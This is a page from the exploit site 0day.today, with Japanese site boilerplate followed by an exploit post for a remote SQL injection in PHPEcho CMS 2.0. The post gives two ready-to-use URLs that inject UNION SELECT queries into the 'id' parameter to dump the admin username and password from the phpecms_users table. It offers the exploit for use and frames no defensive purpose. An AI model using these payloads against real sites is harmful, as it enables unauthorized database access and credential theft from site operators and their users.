0day.today - 最大、世界でのデータベースを利用します。
![](/img/logo_green.jpg)
- 私たちは一つのメインのドメインを使用します。http://0day.today
- 材料のほとんどは 完全に無料
- あなたがしたい場合は エクスプロイトを購入 / V.I.P.を取得アクセス または任意の他のサービスのために支払います、
あなたが購入したり、獲得する必要があります金
ログイン このサイトの管理者が使用しています公式の連絡先.詐欺師にご注意!
![We DO NOT use Telegram or any messengers / social networks!](/img/no_telegram_big.png)
Please, beware of scammers!
次の方法でご連絡することができます:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
PHPEcho CMS 2.0 (id) Remote SQL Injection Vulnerability
======================================================= PHPEcho CMS 2.0 (id) Remote SQL Injection Vulnerability ======================================================= ######################################################################### PHPEcho CMS Remote SQL Injection Exploit ######################################################################### ## Product: PHPEchoCM ## License: GPL ## For version: 2.0 ## AUTHOR : Stack-Terrorist [ v40] ## HOME : http://v4-team.com ## EXPLOITS : username : http://server.com/Path/index.php?module=forum&show=section&id=-1%20union%20select%201,username,3,4%20from%20phpecms_users%20where%20id=1/* password : http://server.com/Path/index.php?module=forum&show=section&id=-1%20union%20select%201,password,3,4%20from%20phpecms_users%20where%20id=1/* ## GREETZ : All members v4 Team & no-hack & tryag & soqor ######################################################################### PHPEcho CMS Remote SQL Injection Exploit ######################################################################### # 0day.today [2024-07-04] #